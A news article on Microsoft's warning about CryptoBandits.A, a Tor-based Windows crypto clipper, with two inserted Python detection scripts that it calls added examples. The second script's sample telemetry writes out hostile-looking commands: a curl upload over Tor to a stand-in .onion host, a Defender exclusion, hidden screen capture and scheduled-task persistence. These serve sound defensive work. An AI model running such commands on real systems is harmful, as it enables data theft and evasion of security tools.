Microsoft Warns of New Crypto Malware That Hijacks Wallet Transfers

By Samuel

Microsoft warns of CryptoBandits.A, a Tor-based Windows clipper that steals wallet data and hijacks crypto transfers.

Microsoft has warned about a Windows-based crypto clipper designed to steal wallet data and alter crypto transfers.

The malware has affected users since February 2026, according to Microsoft Threat Intelligence and Microsoft Defender Experts.

The campaign uses malicious .lnk shortcuts and USB drives to spread across compromised Windows devices.

Microsoft Defender Antivirus detects the threat as Trojan:Win32/CryptoBandits.A, while Defender for Endpoint flags related activity.

Malware Uses Tor to Hide Command Servers

Microsoft said the malware launches through Windows Script Host and ActiveX-based commands after a user opens a malicious shortcut. 

The script then launches a renamed copy of the Tor binary, ugate.exe, in a hidden window. Once Tor is running, the malware reaches its hidden-service command servers through Tor's local proxy.

This method avoids the use of exposed IP-based command infrastructure, making tracking harder for defenders. 

The malware routes its traffic through localhost:9050, the port Tor uses by default for its SOCKS5 proxy. Microsoft described this behavior as a strong warning sign for security teams.

The clipper also creates a victim ID before registering the infected device with its command server. 

That connection allows the attacker to send instructions and receive stolen data. As a result, the tool works as both a crypto stealer and a small remote access backdoor.

Clipper Targets Wallet Addresses and Keys

The malware monitors clipboard activity at a high rate to find crypto wallet addresses and other valuable data. 

When a user copies a wallet address, the clipper can replace it with an attacker-controlled address. This can redirect a transfer before the user notices the change.
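The swap described above leaves a recognisable trace: an address-shaped clipboard value is replaced by a different address of the same family a fraction of a second after the user copied it, by a process the user was not working in. The following Python is an added example of a detection heuristic built on that trace; it is not Microsoft's code and not the malware's. The event stream is constructed, and attributing each clipboard write to a process is an assumption (the Windows clipboard API exposes an owner window, which does not always map cleanly to a process).

```python
"""Clipboard-swap heuristic: flag a crypto address being replaced by a different
address moments after the user copied it.

Added example for illustration; not Microsoft's or the malware's code. Input is a
constructed stream of clipboard-change events. The 'setter' field (which process
wrote the clipboard) is an assumption about what the monitor can observe."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Loose shape checks for two common address families (constructed for the example;
# a real monitor would cover more families and run full checksum validation).
ADDRESS_PATTERNS = {
    "btc": re.compile(r"^(bc1[a-z0-9]{25,62}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})$"),
    "evm": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}
SWAP_WINDOW_SECONDS = 2.0   # a user rarely copies two different addresses this fast
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}


@dataclass
class ClipboardEvent:
    ts: float       # seconds since the monitor started
    content: str    # new clipboard text
    setter: str     # process believed to have written the clipboard (assumption)


def classify(text: str) -> Optional[str]:
    """Return the address family the text looks like, or None."""
    candidate = text.strip()
    for family, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(candidate):
            return family
    return None


def find_swaps(events: List[ClipboardEvent]) -> List[Tuple[ClipboardEvent, ClipboardEvent, str]]:
    """Pair each event with its predecessor and flag suspicious replacements.

    A replacement is suspicious when both values look like addresses of the same
    family, differ, arrive within SWAP_WINDOW_SECONDS, and the second write comes
    from a different process than the first or from a script host."""
    swaps = []
    for prev, cur in zip(events, events[1:]):
        family = classify(prev.content)
        if family is None or classify(cur.content) != family:
            continue
        if prev.content.strip() == cur.content.strip():
            continue
        fast = (cur.ts - prev.ts) <= SWAP_WINDOW_SECONDS
        foreign = cur.setter != prev.setter or cur.setter.lower() in SCRIPT_HOSTS
        if fast and foreign:
            swaps.append((prev, cur, family))
    return swaps


# Constructed sample stream: one hijack, then ordinary user activity.
SAMPLE_EVENTS = [
    ClipboardEvent(10.0, "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2", "chrome.exe"),   # user copies a BTC address
    ClipboardEvent(10.3, "1Kz4f9Y3kQp2mX7vR8sT1nB6cD5eF4gH3J", "wscript.exe"),  # replaced 300 ms later by a script host
    ClipboardEvent(45.0, "meeting notes for tuesday", "winword.exe"),
    ClipboardEvent(90.0, "0x" + "ab" * 20, "chrome.exe"),                        # user copies an EVM address
    ClipboardEvent(130.0, "0x" + "cd" * 20, "chrome.exe"),                       # another one 40 s later: normal
]

if __name__ == "__main__":
    for prev, cur, family in find_swaps(SAMPLE_EVENTS):
        print(f"[{family}] clipboard swapped at t={cur.ts}s by {cur.setter}: "
              f"{prev.content} -> {cur.content}")
```

Run stand-alone it reports the single swap at t=10.3 s and stays quiet on the later user re-copy. The window and the script-host list are the tuning knobs: a shorter window lowers false positives from a user copying two addresses in a row, while the script-host check catches a swap even when the setter cannot be told apart from the original application.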

Microsoft said the malware can also steal seed phrases, private keys, and other wallet-related information. 

These details can give attackers access to funds stored in affected crypto wallets. The malware can also take screenshots and send them to its command server.

The threat includes an anti-analysis check that looks for Task Manager on the infected system. 

When Task Manager is running, the script may terminate to avoid inspection, which makes manual investigation harder during early triage.


USB Spreading Raises Enterprise Risk

Microsoft said the campaign includes a worm component that helps the malware spread through compromised devices. 

The worm creates malicious shortcuts that imitate legitimate files found on the system. It can also use USB drives to move between machines.

The malware adds scheduled tasks to maintain execution and persistence after infection. 

It also delivers file-based payloads and attempts to exclude them from Defender scanning. These steps help the malware remain active after a device restart.

For defenders, Microsoft pointed to behavior-based signals as the clearest detection path. 

These include script interpreters spawning unusual child processes and PowerShell commands tied to screen capture. 

Clipboard inspection, crypto-address replacement, curl-based exfiltration, and Tor proxy usage are also key signs.
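The behavioural signals in the last three paragraphs, together with the scheduled-task and Defender-exclusion steps from the persistence section, translate directly into triage rules over endpoint telemetry. The Python below is an added example of such rules; it is not Microsoft's detection logic. It runs over a constructed list of events shaped loosely like process-creation and network-connection records (fields `type`, `image`, `parent`, `cmdline`, `dst`), and the allowlists, the sample command lines and the `ugate.exe` path are assumptions made for the example.

```python
"""Behaviour-based triage for the signals Microsoft lists for this clipper.

Added example, not Microsoft's detection logic. Runs a handful of rules over a
constructed list of endpoint events (process creations and network connections).
Allowlists and the sample telemetry are assumptions to tune per environment."""
from collections import Counter
from typing import Dict, List, Tuple

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
EXPECTED_SCRIPT_CHILDREN = {"conhost.exe"}          # assumption: children a script host normally spawns
TOR_SOCKS_PROXY = "127.0.0.1:9050"
TOR_PROXY_ALLOWLIST = {"firefox.exe", "tor.exe"}    # assumption: a sanctioned Tor Browser install
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCREEN_CAPTURE_MARKERS = ("copyfromscreen", "system.drawing")
CURL_UPLOAD_FLAGS = ("-F ", "--form", "-d ", "--data", "-T ", "--upload-file")

Event = Dict[str, str]


def evaluate(event: Event) -> List[str]:
    """Return the names of every rule the event trips (possibly several)."""
    hits: List[str] = []
    image = event.get("image", "").lower()
    parent = event.get("parent", "").lower()
    cmdline = event.get("cmdline", "")
    lowered = cmdline.lower()

    if event["type"] == "network":
        # Traffic to the local Tor SOCKS port from anything but a known Tor client.
        if event.get("dst") == TOR_SOCKS_PROXY and image not in TOR_PROXY_ALLOWLIST:
            hits.append("tor_proxy_use")
        return hits

    # Script interpreter spawning a child it normally would not.
    if parent in SCRIPT_HOSTS and image not in EXPECTED_SCRIPT_CHILDREN:
        hits.append("script_host_child")
    # PowerShell carrying screen-capture primitives.
    if image in POWERSHELL and any(m in lowered for m in SCREEN_CAPTURE_MARKERS):
        hits.append("ps_screen_capture")
    # PowerShell adding a Defender exclusion.
    if image in POWERSHELL and "add-mppreference" in lowered and "exclusion" in lowered:
        hits.append("defender_exclusion")
    # curl uploading data, or pointed at the Tor proxy (flags are case-sensitive).
    if image == "curl.exe" and (any(f in cmdline for f in CURL_UPLOAD_FLAGS) or TOR_SOCKS_PROXY in cmdline):
        hits.append("curl_exfil")
    # Scheduled task creation for persistence.
    if (image == "schtasks.exe" and "/create" in lowered) or "register-scheduledtask" in lowered:
        hits.append("scheduled_task_persistence")
    return hits


def run_detections(events: List[Event]) -> List[Tuple[str, str, str]]:
    """(rule, image, cmdline-or-destination) for every hit, in event order."""
    findings = []
    for ev in events:
        detail = ev.get("cmdline") or ev.get("dst", "")
        for rule in evaluate(ev):
            findings.append((rule, ev.get("image", ""), detail))
    return findings


def summarize(events: List[Event]) -> Dict[str, int]:
    """Hit count per rule, for a quick triage view."""
    return dict(Counter(rule for rule, _, _ in run_detections(events)))


# Constructed telemetry. Command lines are abbreviated stand-ins, not real payloads.
SAMPLE_EVENTS: List[Event] = [
    {"type": "process", "parent": "explorer.exe", "image": "wscript.exe",
     "cmdline": "wscript.exe //B C:\\Users\\victim\\Documents\\payload.vbs"},
    {"type": "process", "parent": "wscript.exe", "image": "ugate.exe",
     "cmdline": "ugate.exe -f C:\\ProgramData\\u\\torrc"},
    {"type": "network", "image": "wscript.exe", "dst": "127.0.0.1:9050"},
    {"type": "process", "parent": "wscript.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -c Add-Type -AssemblyName System.Drawing; ... CopyFromScreen ..."},
    {"type": "process", "parent": "wscript.exe", "image": "curl.exe",
     "cmdline": "curl.exe --socks5-hostname 127.0.0.1:9050 -F ... http://PLACEHOLDER.onion/..."},
    {"type": "process", "parent": "wscript.exe", "image": "schtasks.exe",
     "cmdline": "schtasks.exe /create /tn Updater /sc minute /mo 5 /tr C:\\ProgramData\\u\\run.vbs"},
    {"type": "process", "parent": "wscript.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Add-MpPreference -ExclusionPath C:\\ProgramData\\u"},
    # Benign activity that must stay quiet.
    {"type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Temp"},
    {"type": "network", "image": "firefox.exe", "dst": "127.0.0.1:9050"},
    {"type": "process", "parent": "cscript.exe", "image": "conhost.exe", "cmdline": "conhost.exe 0x4"},
]

if __name__ == "__main__":
    for rule, image, detail in run_detections(SAMPLE_EVENTS):
        print(f"{rule:28s} {image:16s} {detail}")
    print(summarize(SAMPLE_EVENTS))
```

The rules are deliberately independent so one event can light up several of them; in the sample the `wscript.exe` lineage alone accounts for every hit, which is the clustering an analyst would pivot on. The two allowlists are where environment-specific noise is handled: a site that runs Tor Browser legitimately adds its images to `TOR_PROXY_ALLOWLIST`, and a site whose logon scripts spawn `cmd.exe` from `cscript.exe` extends `EXPECTED_SCRIPT_CHILDREN` rather than muting the rule.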

The warning comes as crypto users continue to rely on copied wallet addresses for transfers. 

Microsoft advised attention to endpoint behavior, removable drives, and suspicious shortcut activity. 

The campaign shows how wallet transfers can be hijacked through common Windows features and user actions.
